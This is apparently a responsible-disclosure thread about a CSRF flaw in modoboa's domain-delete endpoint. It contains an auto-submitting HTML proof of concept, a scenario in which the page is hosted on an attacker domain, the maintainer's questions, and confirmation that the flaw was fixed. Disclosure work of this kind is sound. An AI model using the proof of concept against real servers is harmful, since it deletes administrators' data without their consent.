CSRF leading to delete a domain in modoboa/modoboa
Reported on
Jan 14th 2023
Description
GET /admin/domains/{id}/delete/ page is vulnerable to a CSRF attack.
Proof of Concept
- Login as admin.
- Create a domain to be deleted. E.g. the domain ID is 4.
- Open the following file in the browser.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:8000/admin/domains/4/delete/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
Admin would be forced to delete domains.
The repo's security policy is disabled but I found the maintainer's email: tonio@ngyn.org
https://github.com/tonioo
SECURITY.md
3 months ago
Hello, I'm the main maintainer of this project. Thank you for this report but I'm not sure to understand why this is a security issue according to your description. If you stay on the same browser and since we use sessions once a user is connected, we can say it is normal that an admin is allowed to delete a domain he created... Could you please tell me if I understand something in the wrong way? Thank you
Here is the scenario to exploit this issue:
Step 1. An attacker serves the HTML file in the Proof of Concept on http://attacker.tld/trap.html.
Step 2. The attacker sends the URL to the admin.
Step 3. The admin opens the URL and the domain specified by the attacker would get deleted.
As a result, the attacker can force the admin to delete any domains, so this is a security issue called CSRF.
@bAu Ok I see. After of few researchs on my side, I finally understood how it could lead to a problem. I'm pushing a fix in a few minutes.
Here is the corresponding PR: https://github.com/modoboa/modoboa/pull/2752
@maintainer I'll check it later. Could you validate this report?
@maintainer I confirmed the vulnerability was fixed! Please mark this issue as fixed and request a CVE!